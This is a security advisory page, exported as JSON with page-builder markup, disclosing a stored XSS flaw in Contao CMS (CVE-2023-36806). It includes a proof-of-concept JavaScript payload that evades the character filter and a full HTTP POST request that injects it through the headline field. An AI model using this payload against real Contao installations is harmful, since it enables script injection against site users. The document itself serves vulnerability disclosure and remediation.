{"id":21078,"date":"2023-10-20T14:12:31","date_gmt":"2023-10-20T12:12:31","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=21078"},"modified":"2023-10-20T15:47:03","modified_gmt":"2023-10-20T13:47:03","slug":"usd-2023-0020","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2023-0020\/","title":{"rendered":"usd-2023-0020"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.21.0\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" sticky_enabled=\"0\"]<\/p>\n

usd-2023-0020 | XSS in Contao v.4.13.28<\/h1>\n

<\/h1>\n

Advisory ID<\/strong>: usd-2023-0020
\nProduct<\/strong>: Contao CMS
\nAffected Version<\/strong>: 4.0.0 to 4.9.42, 4.13.28, and 5.1.10
\nVulnerability Type<\/strong>: CWE-79
\nSecurity Risk<\/strong>: MEDIUM
\nVendor URL<\/strong>: https:\/\/contao.org\/en\/<\/a>
\nVendor Status<\/strong>: Fixed
\nCVE number<\/strong>: CVE-2023-36806
\nCVE Link<\/strong>: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-36806<\/a>
\nLast Update<\/strong>: 2023-08-04<\/p>\n

Desciption<\/h3>\n

Contao is a powerful open source CMS that lets you create professional websites and scalable web applications.<\/p>\n

A user of a low-privileged role can send along an XSS payload via a modification of the request that creates an article with a headline, which is triggered in the frontend and in the backend.<\/p>\n

When choosing the headline, different h<\/strong> tags can be used.
\nHowever, these are not checked by the Contao system on the server side.
\nIf a script<\/strong> tag is sent instead, the headline is embedded in a script<\/strong> tag. The headline can then be used for the content of a payload.
\nAlthough the Contao backend filters out certain special characters like = ( ) < ><\/strong> at this point, this is not sufficient to prevent a successful payload.<\/p>\n

Proof of Concept<\/h3>\n

To include the XSS in the payload, the headline[unit]<\/strong> attribute for the HTML value of the headline must be changed from an h tag<\/strong> to a script tag<\/strong>. Then the following payload can be entered in the headline[value]<\/strong> field:<\/p>\n

Reflect.apply.call*<\/em>${alert}${undefined}${[document.domain]}***<\/p>\n

\n
<\/span>POST<\/span> \/contao?do=article&id=10767&table=tl_content&act=edit&rt=b64d9e8[...]<\/span> HTTP<\/span>\/<\/span>1.1<\/span>\nHost<\/span>:<\/span>vulnerable-host.de<\/span>\n[...]<\/span>\n&headline%5Bvalue%5D=Reflect.apply.call%60%24%7Balert%7D%24%7Bundefined%7D%24%7B%5Bdocument.domain%5D%7D%60\u00b5&\u00b5headline%5Bunit%5D=script\u00b5&text=%3Cp%3Etest%3C%2Fp%3E&addImage=&customTpl=&protected=&guests=&cssID%5B%5D=&cssID%5B%5D=&invisible=&start=&stop=&save=\n<\/pre>\n<\/div>\n
The payload is triggered in the fronted but also in the backend.<\/p>\n
Fix<\/h3>\n
It is recommended to classify any input on the website as potentially dangerous.
\nAll output generated dynamically using user-controlled data should be coded according to the output context.<\/p>\n
In addition, all input should be validated or filtered on the server side. Where possible, a list of allowed characters should also be used to validate input values. The narrower such a filter can be, the more effective its protection.
\nAllowlists are particularly recommended if input values have a precisely defined format or if a list of allowed input values exists.<\/p>\n
References<\/h3>\n